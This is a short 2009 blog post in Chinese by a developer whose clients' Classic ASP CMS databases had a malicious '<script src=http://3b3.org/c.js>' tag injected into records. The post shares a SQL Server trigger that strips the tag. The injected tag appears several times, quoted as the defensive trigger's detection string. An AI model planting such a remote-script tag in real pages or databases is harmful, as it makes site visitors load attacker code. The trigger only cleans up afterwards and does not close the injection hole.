2009年3月31日星期二

什麼是3b3.org???

上個星期公司很多客戶網站都出現一個問題,就是SQL Server中很多紀錄都自動插入了一句"<script src=http://3b3.org/c.js></script>"。開頭以為只是一次半次,點知近幾日開始在同一個Host的網站都有這個問題。

原因當然是出自程式上,因為是同一套自家制CMS,是ASP Classic寫的。最奇怪是這行Script不是Insert Record時加入的,而是在現有Record做Update的。

公司又沒有Log,我又不太想再去修改那單個File有7000行的ASP....最後在MSSQL寫了一個Trigger就當暫時解決辦法了....

不過上Google Search - http://www.google.com.hk/search?q=%3Cscript+src%3Dhttp%3A%2F%2F3b3.org%2Fc.js%3E%3C%2Fscript%3E

發現有大量網站都有同樣問題!

USE [Your_DataBase_Name]
GO
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
ALTER TRIGGER [dbo].[Replace3b3]
ON [dbo].[cmsTable]
AFTER INSERT, UPDATE
AS
DECLARE @SCRIPT VARCHAR(255);
SET @SCRIPT = '<script src=http://3b3.org/c.js></script>';
SELECT ID FROM dbo.cmsTable WHERE 
Column1 LIKE '%'+@SCRIPT+'%' OR Column2 LIKE '%'+@SCRIPT+'%' OR Column3 LIKE '%'+@SCRIPT+'%'
IF @@rowcount > 0
BEGIN UPDATE dbo.cmsTable SET Column1=REPLACE(Column1,@SCRIPT,''),Column2=REPLACE(Column2,@SCRIPT,''),Column3=REPLACE(Column3,@SCRIPT,'')
END

2 則留言:

  1. 係咩CMS? 可以透露嗎?

    回覆刪除
  2. Check過結果係一個惡意程式碼.......

    回覆刪除